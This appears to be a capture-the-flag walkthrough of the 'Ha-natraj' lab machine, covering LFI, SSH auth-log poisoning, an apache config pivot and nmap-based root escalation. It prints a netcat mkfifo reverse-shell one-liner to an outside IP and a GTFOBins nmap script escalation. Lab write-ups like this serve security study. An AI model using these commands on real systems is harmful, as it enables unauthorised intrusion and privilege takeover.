PGP WalkThought:Ha-natraj

彤彤学安全
231 阅读1分钟

本文已参与「新人创作礼」活动,一起开启掘金创作之路

This machine is a CTF-Like machine . We have to guess something to made us a way to get the shell.

Scan

nmap gave a little attack direction . This machine only opened 22 and 80 port.

image-20220528093828672.png

80 port

As report back from dirsearh , I got a interesting directory .

image-20220528094113998.png

It allowed me to see the content of the directory .

image-20220528094137488.png

In it , there was a php file seems block .

image-20220528094323207.png

It might be the exploit .

Shell as www

I tried to use argument "file" to find out the purpose of this php file

image-20220528095146061.png

And finding that there was a LFI exploit

By the way , you can use ctrl + u to make respond information clearer .

Like this.

image-20220528095503620.png

And I could also view the ssh log ./var/log/auth.log

So I injected php code into auth.log by log in ssh with a php code username .

image-20220528110800030.png

Successfully , the code recorded to the log .

image-20220528111018925.png

Now I could got a reverse shell .

But after tried many commands , I realized it should encode the payload .

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.250 4444 >/tmp/f

image-20220528111646386.png

Do not open nc to accept shell.

image-20220528111924340.png

Shell as mahakal

User www can restart the apache server .

image-20220528113816300.png

And I found file apache2.conf could be rewrite by linpeas

image-20220528112715166.png

So , let me edit the apach2.conf to make mahakal to start tha apache server .

Then I could get mahakal's shell .(Why change to root ? Because if I change it to root , the server will start fail .)

image-20220528113112051.png

As it's difficult to edit file at reverse shell . So I adjusted to copy the file to location . And then download back to server . Finaly ,copy the new conf file to override the old conf file

You can do as I following do .

1.copy to location and change the username

image-20220528113516589.png

  1. using python2 to open a simple http server

image-20220528113602666.png

  1. download the conf file by wget and cp to override old file

image-20220528113745333.png
image-20220528113754493.png

  1. Finally , restart the server and reverse the shell again

image-20220528113947978.png

Privilege Escalation to Root

This user can use nmap with SUID .

However its version was so old that I could not use interactive as usual .

And nmap | GTFOBins gave me other way to use nmap .

TF=$(mktemp)
$ echo 'os.execute("/bin/sh")' > $TF
$ sudo nmap --script=$TF

image-20220528114451258.png

Thanks for watching here . And Having a nice day .

: )

avatar
文章
阅读
粉丝